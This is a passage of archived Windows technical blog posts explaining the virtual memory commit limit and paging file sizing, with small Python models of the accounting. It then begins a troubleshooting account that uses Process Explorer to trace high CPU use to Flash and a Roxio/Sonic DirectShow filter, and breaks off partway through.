Reserved virtual memory can’t actually store data or code, but applications sometimes use a reservation to create a large block of virtual memory and then commit it as needed to ensure that the committed memory is contiguous in the address space. When a process commits a region of virtual memory, the operating system guarantees that it can maintain all the data the process stores in the memory either in physical memory or on disk.&nbsp; That means that a process can run up against another limit: the <EM> commit limit </EM> . </P> <P> As you’d expect from the description of the commit guarantee, the commit limit is the sum of physical memory and the sizes of the paging files. In reality, not quite all of physical memory counts toward the commit limit since the operating system reserves part of physical memory for its own use. The amount of committed virtual memory for all the active processes, called the <EM> current commit charge </EM> , cannot exceed the system commit limit. When the commit limit is reached, virtual allocations that commit memory fail. That means that even a standard 32-bit process may get virtual memory allocation failures before it hits the 2GB address space limit. 
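</P> <P> As a rough model of that accounting (a toy sketch, not how the memory manager is implemented), the Python below treats the commit limit as RAM plus paging files minus whatever the system holds back, and refuses any commit request that would push the charge past the limit. The class name <CODE>CommitModel</CODE>, the <CODE>reserved_mb</CODE> parameter, and the sample sizes are assumptions for illustration. </P>

```python
from dataclasses import dataclass
from typing import Tuple


@dataclass
class CommitModel:
    """Toy model of the system commit limit and current commit charge (in MB)."""
    ram_mb: int
    pagefile_mb: Tuple[int, ...]
    reserved_mb: int = 0      # assumed amount of RAM the system keeps for itself
    charge_mb: int = 0        # current commit charge

    @property
    def limit_mb(self) -> int:
        # Commit limit: usable physical memory plus the sizes of all paging files.
        return self.ram_mb - self.reserved_mb + sum(self.pagefile_mb)

    def commit(self, size_mb: int) -> bool:
        """Return False (allocation fails) if the request would exceed the limit."""
        if self.charge_mb + size_mb > self.limit_mb:
            return False
        self.charge_mb += size_mb
        return True


# Hypothetical machine: 1GB of RAM and a single 512MB paging file.
system = CommitModel(ram_mb=1024, pagefile_mb=(512,))

# A 32-bit process committing 100MB at a time, up to its 2GB address space.
committed_mb = 0
while committed_mb + 100 <= 2048 and system.commit(100):
    committed_mb += 100

print(system.limit_mb, committed_mb)
```

<P> In this model the process stops at 1500MB, because the next 100MB would exceed the 1536MB commit limit, well short of the 2GB it could address. 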
</P> <P> The current commit charge and commit limit are tracked by Process Explorer in its System Information window in the Commit Charge section and in the Commit History bar chart and graph: </P> <P> <IMG alt="image" border="0" height="80" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121077i05E449F13698BCF9" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="233" /> <IMG alt="image" border="0" height="120" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_14.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121078i7905D144B95B7DD5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="180" /> </P> <P> Task Manager prior to Vista and Windows Server 2008 shows the current commit charge and limit similarly, but calls the current commit charge "PF Usage" in its graph: </P> <P> <IMG alt="image" border="0" height="244" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121079iF4CE470950C5B819" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="373" /> </P> <P> On Vista and Server 2008, Task Manager doesn't show the commit charge graph and labels the current commit charge and limit values with "Page File" (despite the fact that they will be non-zero values even if you have no paging file): </P> <P> <IMG alt="image" border="0" height="104" 
original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121080iAB36A0FD4D0EA6B1" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="184" /> </P> <P> You can stress the commit limit by running Testlimit with the -m switch, which directs it to allocate committed memory. The 32-bit version of Testlimit may or may not hit its address space limit before hitting the commit limit, depending on the size of physical memory, the size of the paging files and the current commit charge when you run it. If you're running 32-bit Windows and want to see how the system behaves when you hit the commit limit, simply run multiple instances of Testlimit until one hits the commit limit before exhausting its address space. </P> <P> Note that, by default, the paging file is configured to grow, which means that the commit limit will grow when the commit charge nears it. And even when the paging file hits its maximum size, Windows is holding back some memory and its internal tuning, as well as that of applications that cache data, might free up more. Testlimit anticipates this and when it reaches the commit limit, it sleeps for a few seconds and then tries to allocate more memory, repeating this indefinitely until you terminate it. </P> <P> If you run the 64-bit version of Testlimit, it will almost certainly hit the commit limit before exhausting its address space, unless physical memory and the paging files sum to more than 8TB, which as described previously is the size of the 64-bit application-accessible address space. 
Here's the partial output of the 64-bit Testlimit&nbsp; running on my 8GB system (I specified an allocation size of 100MB to make it leak more quickly): </P> <P> <IMG alt="image" border="0" height="301" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121081i1D7B313945B52D88" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> And here's the commit history graph with steps when Testlimit paused to allow the paging file to grow: </P> <P> <IMG alt="image" border="0" height="131" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121082i405569647D36C893" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="249" /> </P> <P> When system virtual memory runs low, applications may fail and you might get strange error messages when attempting routine operations. 
In most cases, though, Windows will be able to present you with the low-memory resolution dialog, like it did for me when I ran this test: </P> <P> <IMG alt="image" border="0" height="252" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image30_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121083i0ACA1CE63DD39ABD" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="324" /> </P> <P> After you exit Testlimit, the commit limit will likely drop again when the memory manager truncates the tail of the paging file that it created to accommodate Testlimit's extreme commit requests. Here, Process Explorer shows that the current limit is well below the peak that was achieved when Testlimit was running: </P> <P> <IMG alt="image" border="0" height="121" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121084i585A56AFA56B9E47" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="181" /> </P> <H3> Process Committed Memory </H3> <P> Because the commit limit is a global resource whose consumption can lead to poor performance, application failures and even system failure, a natural question is 'how much are processes contributing to the commit charge'? To answer that question accurately, you need to understand the different types of virtual memory that an application can allocate. </P> <P> Not all the virtual memory that a process allocates counts toward the commit limit. As you've seen, reserved virtual memory doesn't. 
Virtual memory that represents a file on disk, called a file mapping view, also doesn't count toward the limit unless the application asks for copy-on-write semantics, because Windows can discard any data associated with the view from physical memory and then retrieve it from the file. The virtual memory in Testlimit's address space where its executable and system DLL images are mapped therefore doesn't count toward the commit limit. There are two types of process virtual memory that do count toward the commit limit: private and pagefile-backed. </P> <P> Private virtual memory is the kind that underlies the garbage collector heap, native heap and language allocators. It's called private because by definition it can't be shared between processes. For that reason, it's easy to attribute to a process and Windows tracks its usage with the Private Bytes performance counter. Process Explorer displays a process's private bytes usage in the Private Bytes column, in the Virtual Memory section of the Performance page of the process properties dialog, and displays it in graphical form on the Performance Graph page of the process properties dialog. 
Here's what Testlimit64 looked like when it hit the commit limit: </P> <P> <IMG alt="image" border="0" height="327" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121085i8FE38E8546FED78A" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="230" /> </P> <P> <IMG alt="image" border="0" height="136" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121086iEF0483C499F8D55C" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="471" /> </P> <P> Pagefile-backed virtual memory is harder to attribute, because it can be shared between processes. In fact, there's no process-specific counter you can look at to see how much a process has allocated or is referencing. When you run Testlimit with the -s switch, it allocates pagefile-backed virtual memory until it hits the commit limit, but even after consuming over 29GB of commit, the virtual memory statistics for the process don't provide any indication that it's the one responsible: </P> <P> <IMG alt="image" border="0" height="133" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121087i27039B3A7C02690D" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="205" /> </P> <P> For that reason, I added the -l switch to Handle a while ago. 
A process must open a pagefile-backed virtual memory object, called a section, for it to create a mapping of pagefile-backed virtual memory in its address space. While Windows preserves existing virtual memory even if an application closes the handle to the section that it was made from, most applications keep the handle open.&nbsp; The -l switch prints the size of the allocation for pagefile-backed sections that processes have open. Here's partial output for the handles open by Testlimit after it has run with the -s switch: </P> <P> <IMG alt="image" border="0" height="234" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121088iF0C88A6560AC02E0" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="394" /> </P> <P> You can see that Testlimit is allocating pagefile-backed memory in 1MB blocks and if you summed the size of all the sections it had opened, you'd see that it was at least one of the processes contributing large amounts to the commit charge. </P> <H3> How Big Should I Make the Paging File? </H3> <P> Perhaps one of the most commonly asked questions related to virtual memory is, how big should I make the paging file? There’s no end of ridiculous advice out on the web and in the newsstand magazines that cover Windows, and even Microsoft has published misleading recommendations. Almost all the suggestions are based on multiplying RAM size by some factor, with common values being 1.2, 1.5 and 2. Now that you understand the role that the paging file plays in defining a system’s commit limit and how processes contribute to the commit charge, you’re well positioned to see how useless such formulas truly are. 
</P> <P> Since the commit limit sets an upper bound on how much private and pagefile-backed virtual memory can be allocated concurrently by running processes, the only way to reasonably size the paging file is to know the maximum total commit charge for the programs you like to have running at the same time. If the commit limit is smaller than that number, your programs won’t be able to allocate the virtual memory they want and will fail to run properly. </P> <P> So how do you know how much commit charge your workloads require? You might have noticed in the screenshots that Windows tracks that number and Process Explorer shows it: Peak Commit Charge. To optimally size your paging file you should start all the applications you run at the same time, load typical data sets, and then note the commit charge peak (or look at this value after a period of time where you know maximum load was attained). Set the paging file minimum to be that value minus the amount of RAM in your system (if the value is negative, pick a minimum size to permit the kind of crash dump you are configured for). If you want to have some breathing room for potentially large commit demands, set the maximum to double that number. </P> <P> Some feel having no paging file results in better performance, but in general, having a paging file means Windows can write pages on the modified list (which represent pages that aren’t being accessed actively but have not been saved to disk) out to the paging file, thus making that memory available for more useful purposes (processes or file cache). So while there may be some workloads that perform better with no paging file, in general having one will mean more usable memory being available to the system (never mind that Windows won’t be able to write kernel crash dumps without a paging file sized large enough to hold them). 
</P> <P> Paging file configuration is in the System properties, which you can get to by typing “sysdm.cpl” into the Run dialog, clicking on the Advanced tab, clicking on the Performance Options button, clicking on the Advanced tab (this is <EM> really </EM> advanced), and then clicking on the Change button: </P> <P> <IMG alt="image" border="0" height="302" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121089iAD3AF1E9CF11880D" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="550" /> </P> <P> You’ll notice that the default configuration is for Windows to automatically manage the page file size. When that option is set on Windows XP and Server 2003,&nbsp; Windows creates a single paging file whose minimum size is 1.5 times RAM if RAM is less than 1GB, and RAM if it's greater than 1GB, and that has a maximum size that's three times RAM. On Windows Vista and Server 2008, the minimum is intended to be large enough to hold a kernel-memory crash dump and is RAM plus 300MB or 1GB, whichever is larger. The maximum is either three times the size of RAM or 4GB, whichever is larger. That explains why the peak commit on my 8GB 64-bit system that’s visible in one of the screenshots is 32GB. I guess whoever wrote that code got their guidance from one of those magazines I mentioned! </P> <P> A couple of final limits related to virtual memory are the maximum size and number of paging files supported by Windows. 32-bit Windows has a maximum paging file size of 16TB (4GB if you for some reason run in non-PAE mode) and 64-bit Windows can have paging files that are up to 16TB in size on x64 and 32TB on IA64. Windows 8 ARM’s maximum paging file size is 4GB. 
For all versions, Windows supports up to 16 paging files, where each must be on a separate volume. </P> <TABLE border="1" cellpadding="0" cellspacing="0" width="539"> <TBODY> <TR> <TD valign="top" width="118"> <P> <B> Version </B> </P> </TD> <TD valign="top" width="97"> <P align="center"> <B> Limit on x86 w/o PAE </B> </P> </TD> <TD valign="top" width="91"> <P align="center"> <B> Limit on x86 w/PAE </B> </P> </TD> <TD valign="top" width="77"> <P align="center"> <B> Limit on ARM </B> </P> </TD> <TD valign="top" width="77"> <P align="center"> <B> Limit on x64 </B> </P> </TD> <TD valign="top" width="77"> <P align="center"> <B> Limit on IA64 </B> </P> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows 7 </P> </TD> <TD valign="top" width="97"> <P align="center"> 4 GB </P> </TD> <TD valign="top" width="91"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> <P align="center"> </P> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows 8 </P> </TD> <TD valign="top" width="97"> </TD> <TD valign="top" width="91"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> <P align="center"> 4 GB </P> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows Server 2008 R2 </P> </TD> <TD valign="top" width="97"> </TD> <TD valign="top" width="91"> </TD> <TD valign="top" width="77"> <P align="center"> </P> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> <P align="center"> 32 TB </P> </TD> </TR> <TR> <TD valign="top" width="118"> <P> Windows Server 2012 </P> </TD> <TD valign="top" width="97"> </TD> <TD valign="top" width="91"> </TD> <TD valign="top" width="77"> </TD> <TD valign="top" width="77"> <P align="center"> 16 TB </P> </TD> <TD valign="top" width="77"> </TD> </TR> </TBODY> </TABLE> 
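<P> The sizing rule described earlier in this post, and the automatic sizes Windows Vista and Server 2008 pick, can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the function names are hypothetical, "double that number" is read as twice the minimum, and the commit limit is approximated as RAM plus the maximum paging file size. </P>

```python
MB = 1024 ** 2
GB = 1024 ** 3


def manual_pagefile_size(peak_commit, ram, crash_dump_min):
    """Return (minimum, maximum) paging file sizes in bytes.

    Rule of thumb from the post: minimum = peak commit charge minus RAM.
    When that difference is not positive, fall back to a caller-supplied
    size that is large enough for the configured crash dump type.
    """
    minimum = peak_commit - ram
    if minimum <= 0:
        minimum = crash_dump_min
    # Assumption: "double that number" means twice the minimum.
    maximum = 2 * minimum
    return minimum, maximum


def vista_auto_pagefile_size(ram):
    """Return the (minimum, maximum) sizes the post gives for Vista/Server 2008."""
    minimum = max(ram + 300 * MB, 1 * GB)   # RAM plus 300MB or 1GB, whichever is larger
    maximum = max(3 * ram, 4 * GB)          # 3x RAM or 4GB, whichever is larger
    return minimum, maximum


if __name__ == "__main__":
    ram = 8 * GB

    lo, hi = manual_pagefile_size(peak_commit=12 * GB, ram=ram, crash_dump_min=1 * GB)
    print(f"manual: min {lo / GB:.1f} GB, max {hi / GB:.1f} GB")

    lo, hi = vista_auto_pagefile_size(ram)
    # Approximate commit limit: RAM plus the maximum paging file size.
    print(f"auto:   min {lo / GB:.2f} GB, max {hi / GB:.1f} GB, "
          f"commit limit about {(ram + hi) / GB:.0f} GB")
```

<P> With 8GB of RAM the automatic maximum works out to 24GB, so RAM plus paging file comes to 32GB, which matches the figure quoted above for the 8GB system. The peak commit charge passed to the first function is a made-up value; on a real system you would read it from Process Explorer after running your typical workload. </P>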
</BODY></HTML> Thu, 27 Jun 2019 06:47:11 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-virtual-memory/ba-p/723750 MarkRussinovich 2019-06-27T06:47:11Z The Case of the Slooooow System https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-slooooow-system/ba-p/723708 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Sep 22, 2008 </STRONG> <BR /> <P> A few weeks ago my wife complained that her Vista desktop was not responding to her typing or mouse clicks. Given the importance of the customer, I immediately sat down at the system to troubleshoot.&nbsp; It wasn’t completely hung, but extremely sluggish. For example, the mouse moved and when I clicked on the start button the start menu opened after about 30 seconds. I suspected that something was hogging the CPU and likely could have resolved the problem simply by logging off or rebooting, but knew that if I didn’t determine the root cause and address it, she’d likely be calling on my technical support services again in the near future. In any case, stooping to that kind of troubleshooting hack is beneath my dignity. I therefore set out to investigate. </P> <BR /> <P> My first step was to run <A href="#" mce_href="#" target="_blank"> Process Explorer </A> to see which process was using the CPU. After a few minutes Process Explorer finally appeared and showed that not one, but two processes were involved, each consuming 50% of the CPU: Iexplore.exe and Dllhost.exe. Iexplore is Internet Explorer (IE) and I suspected that IE itself wasn’t the problem, but that it was a browser helper object (BHO), ActiveX control, or some other plugin loaded into IE. Similarly, Dllhost.exe is the host process for out-of-process COM server DLLs, so it was probably not at fault, but the COM server loaded into it. Both required digging deeper and I decided to tackle IE first. 
</P> <BR /> <P> In order to try and get some CPU headroom in which to operate, I suspended the Dllhost process by selecting it in Process Explorer, right-clicking to open the process context menu, and selecting the Suspend entry: </P> <BR /> <P> <IMG alt="image" border="0" height="250" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_16.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121050i43B010A8DEE208B7" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="325" /> </P> <BR /> <P> That put the Dllhost process to sleep and, as I expected, that freed up 50% of the CPU. That’s because the computer was a dual-core system and so to consume 100% of the available CPU cycles a process would have to have two threads, each hogging one of the cores. Most bugs I've seen that result in the CPU being pegged are caused by a single thread. </P> <BR /> <P> Processes don’t execute code, threads do, so I needed to look inside the IE process to see what thread or threads were running. I double-clicked on Iexplore.exe in Process Explorer to open its process properties dialog and switched to the Threads page. 
Several threads were running, but one was dominating the CPU: </P> <BR /> <P> <IMG alt="image" border="0" height="109" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_15.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121051i2D83A1100889D93A" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="441" /> </P> <BR /> <P> From past experience I knew that Ieframe.dll was part of IE, but to be sure I clicked on the modules button on the Threads tab of the Properties dialog and switched to the Details page of the resulting Shell properties dialog: </P> <BR /> <P> <IMG alt="image" border="0" height="249" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_9.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121052iC3E374B6430147EF" width="317" /> </P> <BR /> <P> The description didn't give me a clue as to the thread's specific purpose, so I moved to the second clue about the thread, its start function. Because I had configured Process Explorer to retrieve symbols for Windows images from the Microsoft symbol server in Options-&gt;Configure Symbols, Process Explorer showed the name of the function where each thread began executing. Sometimes the DLL or function where a thread starts executing is enough to identify the thread’s purpose or the software causing a problem. In this case, the thread began in a function named CTabWindow::_TabWindowThreadProc. 
The function name hints that it’s the one in which the main thread of a tab starts running, but that still wasn’t enough to tell me why the thread was running so much; I needed to dig even deeper and look inside the thread to see <EM> where </EM> it was executing. </P> <BR /> <P> To look at what the thread was up to, I double-clicked on it in the Threads list to open the Thread Stack dialog, which shows the functions on the thread’s stack. A stack is essentially an execution history, where each function listed called the one above it on the list and the function at the top of the list is the one most recently executed by the thread at the time Process Explorer looks at the stack. I scrolled through the list, looking for frames that referenced 3rd-party DLLs or Microsoft IE plugins, since they would be far more likely to have a bug than IE’s own code. Sure enough, I found frames pointing at a popular 3rd-party ActiveX control, Adobe Flash: </P> <BR /> <P> <IMG alt="image" border="0" height="232" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_19.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_19.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121053iE0CBB150B91FE24D" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="372" /> </P> <BR /> <P> Just to be sure that I hadn’t happened to catch Flash running when a different component was using most of the CPU time, I closed and reopened the stack dialog several times, but all of them pointed at Flash. </P> <BR /> <P> The first thing I do when I suspect that some software is causing a problem is to check the vendor’s web site to make sure that I have the latest version. 
I opened the Process Explorer DLL view and looked at Flash.ocx’s version, went to Adobe’s site and looked at the version of the current Flash download, and they were the same. </P> <BR /> <P> I was at a dead end. I couldn’t know for sure if Flash had a bug or, more likely, there was a Flash application that had a bug, nor could I be sure that the problem wouldn’t recur. I tried to determine which site was hosting the Flash content by closing tabs one by one, but when I had closed them all the thread was still running. </P> <BR /> <P> At this point the only options I had were to uninstall Flash and leave my wife with a degraded web experience, or terminate IE to stop the current CPU usage and hope that it wouldn’t happen again. I chose the latter and the case remains open. Since investigating this I’ve seen the same Flash behavior again on my wife’s system and on my own, so have been vigilantly watching the Adobe site for a new version just in case it's due to a bug in Flash itself. I was disappointed that there was no actionable result of the investigation, but at least I knew what had caused the CPU usage. </P> <BR /> <P> I now turned my attention to the Dllhost problem with the hope that I'd meet with better success. Process Explorer lists in a tooltip the component or components loaded into hosting processes like Svchost.exe (the Windows service host process), Rundll32 (the Control Panel applet hosting process), Taskeng.exe (the scheduled task hosting process on Vista and Server 2008), and Dllhost.exe. 
I moved the mouse over Dllhost.exe to see what COM server it was running: </P> <BR /> <P> <IMG alt="image" border="0" height="198" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_21.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_21.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121054i2FD950CB2B2016B2" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="468" /> </P> <BR /> <P> It was running the Thumbnail Cache COM server, whose job it is to create Explorer thumbnails for image and media files. It is part of Windows, so once again I had to look inside the process for more clues. I resumed the Dllhost process I had suspended earlier and opened the process properties threads page: </P> <BR /> <P> <IMG alt="image" border="0" height="165" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_23.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_23.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121055iF8EF9A3286215B57" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="582" /> </P> <BR /> <P> The thread consuming the most CPU in this case started in Quartz.dll’s ObjectThread function. 
I looked at its properties and saw that it was another Windows DLL, the DirectShow Runtime, with a generic function name: </P> <BR /> <P> <IMG alt="image" border="0" height="237" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_10.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121056i6201AB4EF2CD2D75" width="314" /> </P> <BR /> <P> Next, I double-clicked to look at the thread stack: </P> <BR /> <P> <IMG alt="image" border="0" height="322" mce_src="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_24.png" original-url="https://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_F063/image_thumb_24.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121057i983885666C470344" style="BORDER-RIGHT-WIDTH: 0px; DISPLAY: inline; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" title="image" width="382" /> </P> <BR /> <P> The first few frames were in User32.dll and Ntdll.dll, core Windows system DLLs, but frames 4-7 are in the Sonicmp4demux.ax (".ax" is an extension commonly used for DirectShow filters), a 3rd-party component. The function names for those frames were the same and didn't make sense because the Microsoft symbol server only stores symbols for software included in Windows. Several more stack snapshots confirmed that it was the code causing the CPU usage. </P> <BR /> <P> Now that I had my suspect, the next step was to check for a newer version. But first I had to figure out what software the DLL came with, which was harder than it seemed. 
I opened the DLL view to take a closer look at the version information, but the description didn't reveal anything: </P> <BR /> <P> <IMG alt="image" border="0" height="208" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image5_thumb.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image5_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121058iFD9F5BAF4610A3C3" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="451" /> </P> <BR /> <P> There were no folders in the Start menu or items in the Add/Remove Programs list with Sonic in the name. I Windows-Live-searched (I expect that word to be added to Webster's any day now) for Sonic and found that it's part of Roxio's CD and DVD authoring software suites. I looked in the Start menu and sure enough, found a Roxio folder: </P> <BR /> <P> <IMG alt="image" border="0" height="70" mce_src="https://msdnshared.blob.core.windows.net/media/TNBlogsFS/BlogFileStorage/blogs_technet/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_2.png" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheSlowSystem_89F3/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121059i84B6494264DF88D5" style="BORDER-RIGHT-WIDTH: 0px; BORDER-TOP-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-LEFT-WIDTH: 0px" width="215" /> </P> <BR /> <P> I ran the Roxio software to check its version number and discovered that the Creator application includes a built-in facility to check for updates. 
